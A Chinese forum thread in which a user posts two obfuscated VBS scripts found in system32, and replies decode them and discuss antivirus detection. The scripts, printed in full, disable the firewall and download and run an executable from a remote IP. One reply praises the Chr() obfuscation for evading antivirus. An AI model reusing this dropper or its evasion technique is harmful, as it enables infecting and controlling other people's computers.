电脑上抓到两个可疑脚本,手头没VB,懒得手工翻译,贴代码给大家看看
在system32文件夹下:
文件1:run.vbs
内容:
set oshell = wscript.createobject (Chr(87)+Chr(115)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(46)+Chr(115)+Chr(104)+Chr(101)+Chr(108)+Chr(108))
Set xPost = CreateObject(Chr(77)+Chr(105)+Chr(99)+Chr(114)+Chr(111)+Chr(115)+Chr(111)+Chr(102)+Chr(116)+Chr(46)+Chr(88)+Chr(77)+Chr(76)+Chr(72)+Chr(84)+Chr(84)+Chr(80))
xPost.Open Chr(71)+Chr(69)+Chr(84),Chr(104)+Chr(116)+Chr(116)+Chr(112)+Chr(58)+Chr(47)+Chr(47)+Chr(50)+Chr(49)+Chr(56)+Chr(46)+Chr(49)+Chr(49)+Chr(46)+Chr(48)+Chr(46)+Chr(49)+Chr(54)+Chr(55)+Chr(58)+Chr(56)+Chr(48)+Chr(56)+Chr(48)+Chr(47)+Chr(49)+Chr(46)+Chr(101)+Chr(120)+Chr(101),Chr(48)
xPost.Send()
Set sGet = CreateObject(Chr(65)+Chr(68)+Chr(79)+Chr(68)+Chr(66)+Chr(46)+Chr(83)+Chr(116)+Chr(114)+Chr(101)+Chr(97)+Chr(109))
sGet.Mode = Chr(51)
sGet.Type = Chr(49)
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile Chr(111)+Chr(107)+Chr(121)+Chr(46)+Chr(101)+Chr(120)+Chr(101),Chr(50)
wscript.sleep Chr(49)+Chr(48)+Chr(48)+Chr(48)+Chr(48)
oshell.run Chr(111)+Chr(107)+Chr(121)+Chr(46)+Chr(101)+Chr(120)+Chr(101)
文件2: run2.vbs
内容:
set shell = wscript.createobject (Chr(87)+Chr(115)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(46)+Chr(115)+Chr(104)+Chr(101)+Chr(108)+Chr(108))
shell.run Chr(110)+Chr(101)+Chr(116)+Chr(32)+Chr(115)+Chr(116)+Chr(111)+Chr(112)+Chr(32)+Chr(115)+Chr(104)+Chr(97)+Chr(114)+Chr(101)+Chr(100)+Chr(97)+Chr(99)+Chr(99)+Chr(101)+Chr(115)+Chr(115),Chr(48)
shell.run Chr(37)+Chr(119)+Chr(105)+Chr(110)+Chr(100)+Chr(105)+Chr(114)+Chr(37)+Chr(92)+Chr(114)+Chr(117)+Chr(110)+Chr(46)+Chr(118)+Chr(98)+Chr(115),Chr(48)
由于不是直接含敏感代码,故而杀毒软件无视.
于是直接将系统的VBS文件打开方式从脚本解释器改成记事本了.
[解决办法]
。。。路过,节分
[解决办法]
[解决办法]
?Chr(87)+Chr(115)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(46)+Chr(115)+Chr(104)+Chr(101)+Chr(108)+Chr(108)
Wscript.shell
?Chr(77)+Chr(105)+Chr(99)+Chr(114)+Chr(111)+Chr(115)+Chr(111)+Chr(102)+Chr(116)+Chr(46)+Chr(88)+Chr(77)+Chr(76)+Chr(72)+Chr(84)+Chr(84)+Chr(80)
Microsoft.XMLHTTP
?Chr(71)+Chr(69)+Chr(84),Chr(104)+Chr(116)+Chr(116)+Chr(112)+Chr(58)+Chr(47)+Chr(47)+Chr(50)+Chr(49)+Chr(56)+Chr(46)+Chr(49)+Chr(49)+Chr(46)+Chr(48)+Chr(46)+Chr(49)+Chr(54)+Chr(55)+Chr(58)+Chr(56)+Chr(48)+Chr(56)+Chr(48)+Chr(47)+Chr(49)+Chr(46)+Chr(101)+Chr(120)+Chr(101),Chr(48)
GET http://218.11.0.167:8080/1.exe 0
?Chr(65)+Chr(68)+Chr(79)+Chr(68)+Chr(66)+Chr(46)+Chr(83)+Chr(116)+Chr(114)+Chr(101)+Chr(97)+Chr(109)
ADODB.Stream
?Chr(111)+Chr(107)+Chr(121)+Chr(46)+Chr(101)+Chr(120)+Chr(101),Chr(50)
oky.exe 2
?Chr(49)+Chr(48)+Chr(48)+Chr(48)+Chr(48)
10000
?Chr(111)+Chr(107)+Chr(121)+Chr(46)+Chr(101)+Chr(120)+Chr(101)
oky.exe
?Chr(87)+Chr(115)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(46)+Chr(115)+Chr(104)+Chr(101)+Chr(108)+Chr(108)
Wscript.shell
?Chr(110)+Chr(101)+Chr(116)+Chr(32)+Chr(115)+Chr(116)+Chr(111)+Chr(112)+Chr(32)+Chr(115)+Chr(104)+Chr(97)+Chr(114)+Chr(101)+Chr(100)+Chr(97)+Chr(99)+Chr(99)+Chr(101)+Chr(115)+Chr(115),Chr(48)
net stop sharedaccess 0
?Chr(37)+Chr(119)+Chr(105)+Chr(110)+Chr(100)+Chr(105)+Chr(114)+Chr(37)+Chr(92)+Chr(114)+Chr(117)+Chr(110)+Chr(46)+Chr(118)+Chr(98)+Chr(115),Chr(48)
%windir%\run.vbs 0
address: Beijing,100140
address: P.R.China
phone: +86-10-66259940
fax-no: +86-10-66259764
country: CN
changed: *****@chinaunicom.cn 20090408
mnt-by: MAINT-CNCGROUP
source: APNIC
person: Kong Lingfei
nic-hdl: KL984-AP
e-mail: *******@chinaunicom.cn
address: 45, Guang An Street, Shi Jiazhuang City, HeBei Province,050011,CN
phone: +86-311-86681601
fax-no: +86-311-86689210
country: cn
changed: *******@chinaunicom.cn 20090206
mnt-by: MAINT-CNCGROUP-HE
source: APNIC
[解决办法]
[解决办法]
[解决办法]
http://www.baidu.com/s?bs=%BF%D7%C1%EE%B7%C9&f=8&wd=0311-86681601&n=2&inputT=2110
[解决办法]
好好学习脚本??
[解决办法]
疯狂的脚本。。。。。。。。。。。。。。。。。。。。。。。。。。
[解决办法]
楼主的杀毒不给力
我用Avast!打开这个页面就报警
复制楼主的内容,保存到文件也被干掉
[解决办法]
我电脑用的微软的杀毒软件,保存哪段代码,也是有提示的!
[解决办法]
顶起来看看,找得到不?
[解决办法]
MSE在保存上面这段代码时也提示有毒。。。
[解决办法]
这样写可以过360,赞一个,学习了。
[解决办法]
路过看看
[解决办法]
高手总是有的,
[解决办法]
nod32第一段扫出来了,第二段没反应
[解决办法]
看看热闹……